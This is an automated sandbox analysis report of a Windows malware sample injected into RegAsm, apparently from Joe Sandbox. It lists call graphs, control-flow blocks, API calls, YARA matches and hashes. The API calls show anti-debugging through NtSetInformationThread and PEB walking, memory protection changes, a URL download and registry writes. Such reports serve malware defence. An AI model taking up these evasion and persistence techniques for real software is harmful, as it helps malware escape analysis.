8130->7976 8132 c39eee 24 API calls 8131->8132 8134 c31de5 8132->8134 8133 c31e61 8133->7976 8134->8133 8135 c39eee 24 API calls 8134->8135 8136 c31e2b 8135->8136 8137 c31e59 8136->8137 8138 c39eee 24 API calls 8136->8138 8137->7976 8138->8137 8140 c31d53 8139->8140 8141 c31d5a 24 API calls 8140->8141 8142 c3690f 8141->8142 8143 c3186b GetLongPathNameW 8142->8143 8144 c36918 8143->8144 8144->7961 8256 c39ef3 8145->8256 8150 c31217 8147->8150 8152 c31100 8150->8152 8182 c3062c 8150->8182 8326 c393ed 8150->8326 8337 c31e6c 8150->8337 8353 c316be 8150->8353 8154 c39eee 23 API calls 8152->8154 8153 c3949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 8153->8182 8156 c34107 8154->8156 8155 c34c36 2 API calls 8155->8182 8156->7970 8157 c381cf 2 API calls 8158 c30aae NtSetInformationThread 8157->8158 8159 c381cf 2 API calls 8158->8159 8159->8182 8160 c33189 8161 c39eee 23 API calls 8160->8161 8163 c3452b 8160->8163 8169 c33601 8161->8169 8162 c34109 GetPEB 8162->8182 8163->7970 8164 c33df6 8165 c39eee 23 API calls 8164->8165 8167 c33e07 8165->8167 8166 c381cf LoadLibraryA GetPEB 8166->8182 8168 c39eee 23 API calls 8167->8168 8170 c33e15 8168->8170 8169->8164 8173 c39eee 23 API calls 8169->8173 8171 c39eee 23 API calls 8170->8171 8172 c33e2d 8171->8172 8175 c39eee 23 API calls 8172->8175 8174 c33723 8173->8174 8174->8164 8177 c39eee 23 API calls 8174->8177 8176 c33e48 8175->8176 8176->7970 8178 c33761 8177->8178 8178->8164 8179 c39eee 23 API calls 8178->8179 8198 c337c7 8179->8198 8180 c39eee 23 API calls 8180->8182 8181 c38a84 8184 c38799 GetPEB 8181->8184 8182->8153 8182->8155 8182->8157 8182->8160 8182->8162 8182->8166 8182->8180 8182->8181 8183 c37ce8 GetPEB 8182->8183 8186 c310ea 8182->8186 8188 c311bf 8182->8188 8189 c31864 GetLongPathNameW 8182->8189 8196 c317bf 23 API calls 8182->8196 8200 c31719 23 API calls 8182->8200 8202 c31dbc 23 API calls 8182->8202 8183->8182 8185 c38aa5 8184->8185 8185->7970 8186->8152 8187 c33189 23 API calls 8186->8187 8187->8186 8190 c311de 8188->8190 8191 c311d1 8188->8191 8193 c31864 GetLongPathNameW 8188->8193 8189->8182 8190->8152 8192 c35a43 8190->8192 8191->8190 8194 c31d3f 23 API calls 8191->8194 8195 c311f0 23 API calls 8192->8195 8193->8191 8194->8190 8197 c35a48 8195->8197 8196->8182 8199 c352b9 23 API calls 8197->8199 8201 c35a58 8197->8201 8198->8164 8203 c39eee 23 API calls 8198->8203 8199->8201 8200->8182 8202->8182 8204 c33952 8203->8204 8204->8164 8205 c39eee 23 API calls 8204->8205 8206 c33d94 8205->8206 8206->8164 8207 c33d9b 8206->8207 8208 c39eee 23 API calls 8207->8208 8209 c33db6 8208->8209 8210 c39eee 23 API calls 8209->8210 8211 c33dce 8210->8211 8211->7970 8213 c357fa 8212->8213 8214 c352d9 8212->8214 8216 c39eee 22 API calls 8213->8216 8215 c39eee 22 API calls 8214->8215 8217 c35306 8215->8217 8218 c3580a 8216->8218 8217->8213 8219 c35310 InternetOpenUrlA 8217->8219 8218->7977 8219->8213 8221 c3533c 8219->8221 8220 c39eee 22 API calls 8220->8221 8221->8213 8221->8220 8222 c357b6 8221->8222 8223 c39eee 22 API calls 8222->8223 8224 c357ce 8223->8224 8225 c39eee 22 API calls 8224->8225 8226 c357e1 8225->8226 8226->7977 8227->8000 8228->7994 8229->8001 8230->7996 8231->8020 8233 c3694e 8232->8233 8236 c3187b 8233->8236 8235 c36953 8235->8053 8237 c31898 8236->8237 8240 c37c33 GetLongPathNameW 8237->8240 8239 c318b8 8239->8235 8240->8239 8242 c31818 8241->8242 8255 c31820 RegSetValueExA 8242->8255 8244 c368c2 8245 c317ce 23 API calls 8244->8245 8246 c36918 8244->8246 8247 c368d8 8245->8247 8246->8057 8247->8246 8248 c31d5a 23 API calls 8247->8248 8249 c3690f 8248->8249 8250 c3186b GetLongPathNameW 8249->8250 8250->8246 8252 c31d68 8251->8252 8253 c31dbc 24 API calls 8252->8253 8254 c31db9 8253->8254 8254->8061 8255->8244 8257 c39ef8 8256->8257 8257->8257 8323 c38fc5 8257->8323 8259 c3949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 8276 c3062c 8259->8276 8260 c34c36 2 API calls 8260->8276 8261 c381cf 2 API calls 8263 c30aae NtSetInformationThread 8261->8263 8262 c3a308 8266 c3a7b1 8262->8266 8268 c3a7f4 8262->8268 8262->8276 8264 c381cf 2 API calls 8263->8264 8264->8276 8265 c3a7d8 NtQueryInformationProcess 8265->8266 8266->8265 8266->8266 8266->8268 8267 c33189 8269 c39eee 22 API calls 8267->8269 8271 c3452b 8267->8271 8268->8268 8273 c33601 8269->8273 8270 c34109 GetPEB 8270->8276 8272 c33df6 8274 c39eee 22 API calls 8272->8274 8273->8272 8281 c39eee 22 API calls 8273->8281 8275 c33e07 8274->8275 8277 c39eee 22 API calls 8275->8277 8276->8259 8276->8260 8276->8261 8276->8267 8276->8270 8287 c381cf LoadLibraryA GetPEB 8276->8287 8289 c39eee 22 API calls 8276->8289 8290 c38a84 8276->8290 8291 c37ce8 GetPEB 8276->8291 8294 c310ea 8276->8294 8296 c311bf 8276->8296 8297 c31864 GetLongPathNameW 8276->8297 8305 c317bf 22 API calls 8276->8305 8311 c31719 22 API calls 8276->8311 8313 c31dbc 22 API calls 8276->8313 8278 c33e15 8277->8278 8279 c39eee 22 API calls 8278->8279 8280 c33e2d 8279->8280 8283 c39eee 22 API calls 8280->8283 8282 c33723 8281->8282 8282->8272 8285 c39eee 22 API calls 8282->8285 8284 c33e48 8283->8284 8286 c33761 8285->8286 8286->8272 8288 c39eee 22 API calls 8286->8288 8287->8276 8309 c337c7 8288->8309 8289->8276 8292 c38799 GetPEB 8290->8292 8291->8276 8293 c38aa5 8292->8293 8295 c33189 22 API calls 8294->8295 8300 c31100 8294->8300 8295->8294 8298 c311de 8296->8298 8299 c311d1 8296->8299 8302 c31864 GetLongPathNameW 8296->8302 8297->8276 8298->8300 8301 c35a43 8298->8301 8299->8298 8303 c31d3f 22 API calls 8299->8303 8306 c39eee 22 API calls 8300->8306 8304 c311f0 22 API calls 8301->8304 8302->8299 8303->8298 8307 c35a48 8304->8307 8305->8276 8308 c34107 8306->8308 8310 c352b9 22 API calls 8307->8310 8312 c35a58 8307->8312 8309->8272 8314 c39eee 22 API calls 8309->8314 8310->8312 8311->8276 8313->8276 8315 c33952 8314->8315 8315->8272 8316 c39eee 22 API calls 8315->8316 8317 c33d94 8316->8317 8317->8272 8318 c33d9b 8317->8318 8319 c39eee 22 API calls 8318->8319 8320 c33db6 8319->8320 8321 c39eee 22 API calls 8320->8321 8322 c33dce 8321->8322 8324 c38799 GetPEB 8323->8324 8325 c38fd8 8324->8325 8325->8262 8327 c39402 8326->8327 8328 c381cf 8326->8328 8327->8150 8329 c3822b LoadLibraryA 8328->8329 8330 c38799 GetPEB 8328->8330 8331 c38235 8329->8331 8332 c381ed 8330->8332 8331->8150 8333 c38799 GetPEB 8332->8333 8334 c38219 8332->8334 8335 c38204 8333->8335 8334->8329 8335->8334 8336 c38799 GetPEB 8335->8336 8336->8334 8338 c381cf 2 API calls 8337->8338 8339 c31e7e 8338->8339 8340 c39eee 23 API calls 8339->8340 8350 c323c9 8339->8350 8340->8339 8342 c32967 GetPEB 8345 c3298e 8342->8345 8343 c32a5f 8344 c32a71 8343->8344 8420 c32f84 8343->8420 8347 c3a810 8344->8347 8424 c32a91 8344->8424 8345->8343 8349 c39eee 23 API calls 8345->8349 8351 c32a2c 8345->8351 8349->8345 8415 c3302c 8350->8415 8352 c39eee 23 API calls 8351->8352 8352->8343 8402 c3062c 8353->8402 8354 c31706 8354->8150 8355 c34c36 2 API calls 8355->8402 8356 c381cf 2 API calls 8357 c30aae NtSetInformationThread 8356->8357 8358 c381cf 2 API calls 8357->8358 8358->8402 8359 c33189 8360 c39eee 23 API calls 8359->8360 8362 c3452b 8359->8362 8367 c33601 8360->8367 8361 c34109 GetPEB 8361->8402 8362->8150 8363 c33df6 8364 c39eee 23 API calls 8363->8364 8365 c33e07 8364->8365 8366 c39eee 23 API calls 8365->8366 8368 c33e15 8366->8368 8367->8363 8371 c39eee 23 API calls 8367->8371 8369 c39eee 23 API calls 8368->8369 8370 c33e2d 8369->8370 8373 c39eee 23 API calls 8370->8373 8372 c33723 8371->8372 8372->8363 8375 c39eee 23 API calls 8372->8375 8374 c33e48 8373->8374 8374->8150 8376 c33761 8375->8376 8376->8363 8378 c39eee 23 API calls 8376->8378 8377 c381cf LoadLibraryA GetPEB 8377->8402 8399 c337c7 8378->8399 8379 c39eee 23 API calls 8379->8402 8380 c38a84 8382 c38799 GetPEB 8380->8382 8381 c37ce8 GetPEB 8381->8402 8383 c38aa5 8382->8383 8383->8150 8384 c310ea 8385 c33189 23 API calls 8384->8385 8390 c31100 8384->8390 8385->8384 8386 c311bf 8388 c311de 8386->8388 8389 c311d1 8386->8389 8392 c31864 GetLongPathNameW 8386->8392 8387 c31864 GetLongPathNameW 8387->8402 8388->8390 8391 c35a43 8388->8391 8389->8388 8393 c31d3f 23 API calls 8389->8393 8396 c39eee 23 API calls 8390->8396 8394 c311f0 23 API calls 8391->8394 8392->8389 8393->8388 8397 c35a48 8394->8397 8395 c317bf 23 API calls 8395->8402 8398 c34107 8396->8398 8400 c352b9 23 API calls 8397->8400 8404 c35a58 8397->8404 8398->8150 8399->8363 8406 c39eee 23 API calls 8399->8406 8400->8404 8401 c3949d LoadLibraryA GetPEB GetPEB NtProtectVirtualMemory 8401->8402 8402->8150 8402->8354 8402->8355 8402->8356 8402->8359 8402->8361 8402->8377 8402->8379 8402->8380 8402->8381 8402->8384 8402->8386 8402->8387 8402->8395 8402->8401 8403 c31719 23 API calls 8402->8403 8405 c31dbc 23 API calls 8402->8405 8403->8402 8405->8402 8407 c33952 8406->8407 8407->8363 8408 c39eee 23 API calls 8407->8408 8409 c33d94 8408->8409 8409->8363 8410 c33d9b 8409->8410 8411 c39eee 23 API calls 8410->8411 8412 c33db6 8411->8412 8413 c39eee 23 API calls 8412->8413 8414 c33dce 8413->8414 8414->8150 8416 c330a5 8415->8416 8417 c3060e 8415->8417 8416->8342 8417->8416 8439 c305e5 EnumWindows 8417->8439 8419 c30613 8419->8342 8421 c32f89 8420->8421 8505 c32f8e 8421->8505 8423 c34cf9 8423->8344 8425 c32aa5 8424->8425 8425->8425 8426 c32aaf GetPEB 8425->8426 8427 c39eee 21 API calls 8426->8427 8428 c32afb 8427->8428 8429 c32a7c 8428->8429 8430 c39eee 21 API calls 8428->8430 8431 c32a91 21 API calls 8429->8431 8435 c3a810 8429->8435 8432 c32b24 Sleep 8430->8432 8431->8435 8433 c32f6b TerminateThread 8432->8433 8434 c32b3e 8432->8434 8433->8434 8513 c32b4a 8434->8513 8435->8435 8440 c305ff 8439->8440 8444 c3062c 8439->8444 8441 c305e5 22 API calls 8440->8441 8442 c30613 8441->8442 8442->8419 8443 c3949d 4 API calls 8443->8444 8444->8443 8445 c34c36 2 API calls 8444->8445 8446 c381cf 2 API calls 8444->8446 8449 c33189 8444->8449 8451 c34109 GetPEB 8444->8451 8467 c381cf LoadLibraryA GetPEB 8444->8467 8469 c39eee 22 API calls 8444->8469 8470 c38a84 8444->8470 8471 c37ce8 GetPEB 8444->8471 8474 c310ea 8444->8474 8476 c311bf 8444->8476 8477 c31864 GetLongPathNameW 8444->8477 8485 c317bf 22 API calls 8444->8485 8493 c3114f 8444->8493 8445->8444 8447 c30aae NtSetInformationThread 8446->8447 8448 c381cf 2 API calls 8447->8448 8448->8444 8450 c39eee 22 API calls 8449->8450 8452 c3452b 8449->8452 8456 c33601 8450->8456 8451->8444 8452->8419 8453 c33df6 8454 c39eee 22 API calls 8453->8454 8455 c33e07 8454->8455 8457 c39eee 22 API calls 8455->8457 8456->8453 8461 c39eee 22 API calls 8456->8461 8458 c33e15 8457->8458 8459 c39eee 22 API calls 8458->8459 8460 c33e2d 8459->8460 8463 c39eee 22 API calls 8460->8463 8462 c33723 8461->8462 8462->8453 8465 c39eee 22 API calls 8462->8465 8464 c33e48 8463->8464 8464->8419 8466 c33761 8465->8466 8466->8453 8468 c39eee 22 API calls 8466->8468 8467->8444 8489 c337c7 8468->8489 8469->8444 8472 c38799 GetPEB 8470->8472 8471->8444 8473 c38aa5 8472->8473 8473->8419 8475 c33189 22 API calls 8474->8475 8480 c31100 8474->8480 8475->8474 8478 c311de 8476->8478 8479 c311d1 8476->8479 8482 c31864 GetLongPathNameW 8476->8482 8477->8444 8478->8480 8481 c35a43 8478->8481 8479->8478 8483 c31d3f 22 API calls 8479->8483 8486 c39eee 22 API calls 8480->8486 8484 c311f0 22 API calls 8481->8484 8482->8479 8483->8478 8487 c35a48 8484->8487 8485->8444 8488 c34107 8486->8488 8490 c352b9 22 API calls 8487->8490 8494 c35a58 8487->8494 8488->8419 8489->8453 8496 c39eee 22 API calls 8489->8496 8490->8494 8491 c3949d 4 API calls 8491->8493 8492 c31719 22 API calls 8492->8493 8493->8444 8493->8491 8493->8492 8495 c31dbc 22 API calls 8493->8495 8495->8493 8497 c33952 8496->8497 8497->8453 8498 c39eee 22 API calls 8497->8498 8499 c33d94 8498->8499 8499->8453 8500 c33d9b 8499->8500 8501 c39eee 22 API calls 8500->8501 8502 c33db6 8501->8502 8503 c39eee 22 API calls 8502->8503 8504 c33dce 8503->8504 8504->8419 8506 c32f9b 8505->8506 8508 c3060e 8506->8508 8511 c32f89 8506->8511 8507 c32f8e 24 API calls 8512 c34cf9 8507->8512 8509 c305e5 24 API calls 8508->8509 8510 c30613 8509->8510 8510->8423 8511->8423 8511->8507 8512->8423 8514 c32f54 TerminateThread 8513->8514 8516 c34bb7 8514->8516 8517 c32b4a 23 API calls 8516->8517 8519 c34bbc 8517->8519 8518 c38fc5 GetPEB 8518->8519 8519->8518 8520 c3a80b 8519->8520 8521 c3a810 8520->8521 8522 c32a91 23 API calls 8520->8522 8522->8521 8549 1d89a2d6 8550 1d89a302 SetErrorMode 8549->8550 8552 1d89a32b 8549->8552 8551 1d89a317 8550->8551 8552->8550

                                  Executed Functions

                                  Function 00C305E5, Relevance: 11.5, APIs: 2, Strings: 4, Instructions: 958nativethreadUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 c305e5-c305fd EnumWindows 1 c305ff-c3060e call c305e5 0->1 2 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 0->2 11 c30613-c30626 1->11 23 c30aeb-c30b00 2->23 24 c30b06-c30b23 call c38314 23->24 25 c33189-c331e1 call c33e58 23->25 29 c30b28-c30b2c 24->29 31 c331e6-c335ed 25->31 32 c331e1 call c33e58 25->32 29->23 30 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 29->30 62 c30b8b-c30bf3 call c381cf call c39eee 30->62 63 c31078-c310d8 call c381cf * 2 call c39eee 30->63 35 c335f3-c33620 call c39eee 31->35 36 c3452b-c34534 31->36 32->31 47 c33df6-c33e51 call c39eee * 4 35->47 48 c33626-c33726 call c33fdf call c37d70 call c39eee 35->48 38 c34535-c3454c 36->38 38->38 41 c3454e-c345a2 38->41 48->47 74 c3372c-c33767 call c39eee 48->74 62->63 81 c30bf9-c30c05 62->81 95 c38a84-c38f11 call c38799 call c38ab5 63->95 96 c310de-c310e8 call c37ce8 63->96 74->47 83 c3376d-c337cc call c39eee 74->83 84 c30c0b-c30c2a call c382c4 81->84 83->47 92 c337d2-c337d7 83->92 93 c30c51-c30c56 84->93 94 c30c2c-c30c35 84->94 92->47 98 c337dd-c33825 call c337f9 92->98 93->95 101 c30c5c-c31053 93->101 94->95 99 c30c3b-c30c40 94->99 110 c3110b-c31111 96->110 111 c310ea 96->111 121 c33827-c3382c 98->121 122 c33834-c33840 98->122 99->95 104 c30c46-c30c4b 99->104 101->95 107 c31059-c3105e 101->107 104->93 104->95 107->95 113 c31064-c31069 107->113 116 c31117-c31143 call c31864 call c37d70 call c317bf 110->116 117 c311af-c311b9 110->117 112 c310f4-c310fe call c33189 111->112 134 c31100-c31104 112->134 113->95 119 c3106f-c31072 113->119 116->2 155 c31149-c3114d 116->155 117->2 123 c311bf-c311c4 117->123 119->63 119->84 121->47 127 c33832 121->127 122->47 128 c33841-c3388e call c38314 122->128 129 c311c6-c311ca 123->129 130 c311de-c311eb 123->130 127->122 128->47 148 c33894-c33919 call c3452b call c338d6 128->148 131 c311d9 call c31d3f 129->131 132 c311cc-c311d7 call c31864 129->132 135 c35a43-c35a52 call c311f0 130->135 136 c340a3-c34108 call c39eee 130->136 131->130 132->130 132->131 134->136 151 c35a56 135->151 152 c35abf-c35ac6 call c352b9 135->152 148->47 179 c3391f-c33957 call c39eee 148->179 156 c35a58-c35a7f 151->156 157 c35abd-c35abe 151->157 164 c35b31-c35f1a 152->164 165 c35ac8-c35ae3 152->165 155->117 161 c3114f-c311ae call c3949d call c31719 call c31dbc 155->161 167 c35a82-c35aac 156->167 168 c35ae7-c35aee 156->168 157->152 161->117 171 c35ae4 165->171 167->171 180 c35aae-c35ac6 call c35200 167->180 173 c35af0-c35b1e 168->173 174 c35b1f-c35b2c 168->174 171->168 173->174 174->164 179->47 187 c3395d-c33d99 call c39eee 179->187 180->164 180->165 187->47 192 c33d9b-c33dd3 call c39eee * 2 187->192
                                  APIs
                                  • EnumWindows.USER32(00C30613,?,00000000,00C3643A,00C35F92,?,00C331E6,?,?,?,?,?,00000000,00000004,00000000,00000000), ref: 00C305F4
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EnumInformationThreadWindows
                                  • String ID: 1.!T$249E$249E$shell32
                                  • API String ID: 1954852945-4191954164
                                  • Opcode ID: ef336fe1ccbfa999da492ee3b533c1c2b5a0f666d657459043e314add5ecdc56
                                  • Instruction ID: d92168b9f47fe779e9444ab1e3c852425cbfa68fc0c748bba569c72db4d081ac
                                  • Opcode Fuzzy Hash: ef336fe1ccbfa999da492ee3b533c1c2b5a0f666d657459043e314add5ecdc56
                                  • Instruction Fuzzy Hash: 4652E293E2E9143B96A05D29FCE23AB96E55751310FB8E2099E119F74FE76CF80243C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C316BE, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 558UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 197 c316be 198 c316bf-c316d7 197->198 199 c316f0-c31700 198->199 200 c316d9-c316e3 198->200 202 c31706-c3170d 199->202 203 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 199->203 200->198 201 c316e5-c316eb 200->201 201->199 220 c30aeb-c30b00 203->220 221 c30b06-c30b2c call c38314 220->221 222 c33189-c331e1 call c33e58 220->222 221->220 227 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 221->227 228 c331e6-c335ed 222->228 229 c331e1 call c33e58 222->229 259 c30b8b-c30bf3 call c381cf call c39eee 227->259 260 c31078-c310d8 call c381cf * 2 call c39eee 227->260 232 c335f3-c33620 call c39eee 228->232 233 c3452b-c34534 228->233 229->228 244 c33df6-c33e51 call c39eee * 4 232->244 245 c33626-c33726 call c33fdf call c37d70 call c39eee 232->245 235 c34535-c3454c 233->235 235->235 238 c3454e-c345a2 235->238 245->244 271 c3372c-c33767 call c39eee 245->271 259->260 278 c30bf9-c30c05 259->278 292 c38a84-c38f11 call c38799 call c38ab5 260->292 293 c310de-c310e8 call c37ce8 260->293 271->244 280 c3376d-c337cc call c39eee 271->280 281 c30c0b-c30c2a call c382c4 278->281 280->244 289 c337d2-c337d7 280->289 290 c30c51-c30c56 281->290 291 c30c2c-c30c35 281->291 289->244 295 c337dd-c33825 call c337f9 289->295 290->292 298 c30c5c-c31053 290->298 291->292 296 c30c3b-c30c40 291->296 307 c3110b-c31111 293->307 308 c310ea 293->308 318 c33827-c3382c 295->318 319 c33834-c33840 295->319 296->292 301 c30c46-c30c4b 296->301 298->292 304 c31059-c3105e 298->304 301->290 301->292 304->292 310 c31064-c31069 304->310 313 c31117-c31143 call c31864 call c37d70 call c317bf 307->313 314 c311af-c311b9 307->314 309 c310f4-c310fe call c33189 308->309 331 c31100-c31104 309->331 310->292 316 c3106f-c31072 310->316 313->203 352 c31149-c3114d 313->352 314->203 320 c311bf-c311c4 314->320 316->260 316->281 318->244 324 c33832 318->324 319->244 325 c33841-c3388e call c38314 319->325 326 c311c6-c311ca 320->326 327 c311de-c311eb 320->327 324->319 325->244 345 c33894-c33919 call c3452b call c338d6 325->345 328 c311d9 call c31d3f 326->328 329 c311cc-c311d7 call c31864 326->329 332 c35a43-c35a52 call c311f0 327->332 333 c340a3-c34108 call c39eee 327->333 328->327 329->327 329->328 331->333 348 c35a56 332->348 349 c35abf-c35ac6 call c352b9 332->349 345->244 376 c3391f-c33957 call c39eee 345->376 353 c35a58-c35a7f 348->353 354 c35abd-c35abe 348->354 361 c35b31-c35f1a 349->361 362 c35ac8-c35ae3 349->362 352->314 358 c3114f-c311ae call c3949d call c31719 call c31dbc 352->358 364 c35a82-c35aac 353->364 365 c35ae7-c35aee 353->365 354->349 358->314 368 c35ae4 362->368 364->368 377 c35aae-c35ac6 call c35200 364->377 370 c35af0-c35b1e 365->370 371 c35b1f-c35b2c 365->371 368->365 370->371 371->361 376->244 384 c3395d-c33d99 call c39eee 376->384 377->361 377->362 384->244 389 c33d9b-c33dd3 call c39eee * 2 384->389
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: f37ffea9538b30e627322f44a590c35cec46f9b9056e11cc572dd1554f423dad
                                  • Instruction ID: ad2ead207169fba45a7910bc273afb8bb939989a79980ad655ccb01ee9f8f9c8
                                  • Opcode Fuzzy Hash: f37ffea9538b30e627322f44a590c35cec46f9b9056e11cc572dd1554f423dad
                                  • Instruction Fuzzy Hash: 71024670B60349AFEF305E64CC92BDA3762EF46750F644129FE449B2C1CBB99989DB01
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00C30631, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 486nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 394 c30631-c30a34 395 c30a3c-c30ae6 call c381cf call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 394->395 396 c30a37 call c381cf 394->396 410 c30aeb-c30b00 395->410 396->395 411 c30b06-c30b2c call c38314 410->411 412 c33189-c331e1 call c33e58 410->412 411->410 417 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 411->417 418 c331e6-c335ed 412->418 419 c331e1 call c33e58 412->419 449 c30b8b-c30bf3 call c381cf call c39eee 417->449 450 c31078-c310d8 call c381cf * 2 call c39eee 417->450 422 c335f3-c33620 call c39eee 418->422 423 c3452b-c34534 418->423 419->418 434 c33df6-c33e51 call c39eee * 4 422->434 435 c33626-c33726 call c33fdf call c37d70 call c39eee 422->435 425 c34535-c3454c 423->425 425->425 428 c3454e-c345a2 425->428 435->434 461 c3372c-c33767 call c39eee 435->461 449->450 468 c30bf9-c30c05 449->468 482 c38a84-c38f11 call c38799 call c38ab5 450->482 483 c310de-c310e8 call c37ce8 450->483 461->434 470 c3376d-c337cc call c39eee 461->470 471 c30c0b-c30c2a call c382c4 468->471 470->434 479 c337d2-c337d7 470->479 480 c30c51-c30c56 471->480 481 c30c2c-c30c35 471->481 479->434 485 c337dd-c33825 call c337f9 479->485 480->482 488 c30c5c-c31053 480->488 481->482 486 c30c3b-c30c40 481->486 497 c3110b-c31111 483->497 498 c310ea 483->498 508 c33827-c3382c 485->508 509 c33834-c33840 485->509 486->482 491 c30c46-c30c4b 486->491 488->482 494 c31059-c3105e 488->494 491->480 491->482 494->482 500 c31064-c31069 494->500 503 c31117-c31143 call c31864 call c37d70 call c317bf 497->503 504 c311af-c311b9 497->504 499 c310f4-c310fe call c33189 498->499 523 c31100-c31104 499->523 500->482 506 c3106f-c31072 500->506 511 c3062c-c30a37 call c381cf 503->511 545 c31149-c3114d 503->545 510 c311bf-c311c4 504->510 504->511 506->450 506->471 508->434 516 c33832 508->516 509->434 517 c33841-c3388e call c38314 509->517 518 c311c6-c311ca 510->518 519 c311de-c311eb 510->519 511->395 516->509 517->434 538 c33894-c33919 call c3452b call c338d6 517->538 520 c311d9 call c31d3f 518->520 521 c311cc-c311d7 call c31864 518->521 525 c35a43-c35a52 call c311f0 519->525 526 c340a3-c34108 call c39eee 519->526 520->519 521->519 521->520 523->526 541 c35a56 525->541 542 c35abf-c35ac6 call c352b9 525->542 538->434 569 c3391f-c33957 call c39eee 538->569 546 c35a58-c35a7f 541->546 547 c35abd-c35abe 541->547 554 c35b31-c35f1a 542->554 555 c35ac8-c35ae3 542->555 545->504 551 c3114f-c311ae call c3949d call c31719 call c31dbc 545->551 557 c35a82-c35aac 546->557 558 c35ae7-c35aee 546->558 547->542 551->504 561 c35ae4 555->561 557->561 570 c35aae-c35ac6 call c35200 557->570 563 c35af0-c35b1e 558->563 564 c35b1f-c35b2c 558->564 561->558 563->564 564->554 569->434 577 c3395d-c33d99 call c39eee 569->577 570->554 570->555 577->434 582 c33d9b-c33dd3 call c39eee * 2 577->582
                                  APIs
                                    • Part of subcall function 00C381CF: LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 075b58a0557ade9534a3dec0b9382b3f104376bb3c31c7d4d482421de13dbc5e
                                  • Instruction ID: af40867200b41dcca47869dce27590a3529cd58d69e7a1e98ca2d87bda4683b4
                                  • Opcode Fuzzy Hash: 075b58a0557ade9534a3dec0b9382b3f104376bb3c31c7d4d482421de13dbc5e
                                  • Instruction Fuzzy Hash: E2E1CE93E2E6147FA6A05D29E8E279FA2D24750300FB8D1099E119F78DE7ACFC4643C1
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Function 00C311F0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 295nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 587 c311f0-c31228 call c39447 590 c3122e-c3122f 587->590 591 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 587->591 593 c31235-c3125a call c3521f 590->593 625 c30aeb-c30b00 591->625 599 c31260-c3168a call c393ed 593->599 600 c31696-c316b1 call c316be 593->600 599->591 611 c31690-c31691 call c31e6c 599->611 600->593 613 c340a3-c34108 call c39eee 600->613 611->600 626 c30b06-c30b2c call c38314 625->626 627 c33189-c331e1 call c33e58 625->627 626->625 632 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 626->632 633 c331e6-c335ed 627->633 634 c331e1 call c33e58 627->634 664 c30b8b-c30bf3 call c381cf call c39eee 632->664 665 c31078-c310d8 call c381cf * 2 call c39eee 632->665 637 c335f3-c33620 call c39eee 633->637 638 c3452b-c34534 633->638 634->633 649 c33df6-c33e51 call c39eee * 4 637->649 650 c33626-c33726 call c33fdf call c37d70 call c39eee 637->650 640 c34535-c3454c 638->640 640->640 643 c3454e-c345a2 640->643 650->649 676 c3372c-c33767 call c39eee 650->676 664->665 683 c30bf9-c30c05 664->683 697 c38a84-c38f11 call c38799 call c38ab5 665->697 698 c310de-c310e8 call c37ce8 665->698 676->649 685 c3376d-c337cc call c39eee 676->685 686 c30c0b-c30c2a call c382c4 683->686 685->649 694 c337d2-c337d7 685->694 695 c30c51-c30c56 686->695 696 c30c2c-c30c35 686->696 694->649 700 c337dd-c33825 call c337f9 694->700 695->697 703 c30c5c-c31053 695->703 696->697 701 c30c3b-c30c40 696->701 712 c3110b-c31111 698->712 713 c310ea 698->713 723 c33827-c3382c 700->723 724 c33834-c33840 700->724 701->697 706 c30c46-c30c4b 701->706 703->697 709 c31059-c3105e 703->709 706->695 706->697 709->697 715 c31064-c31069 709->715 718 c31117-c31143 call 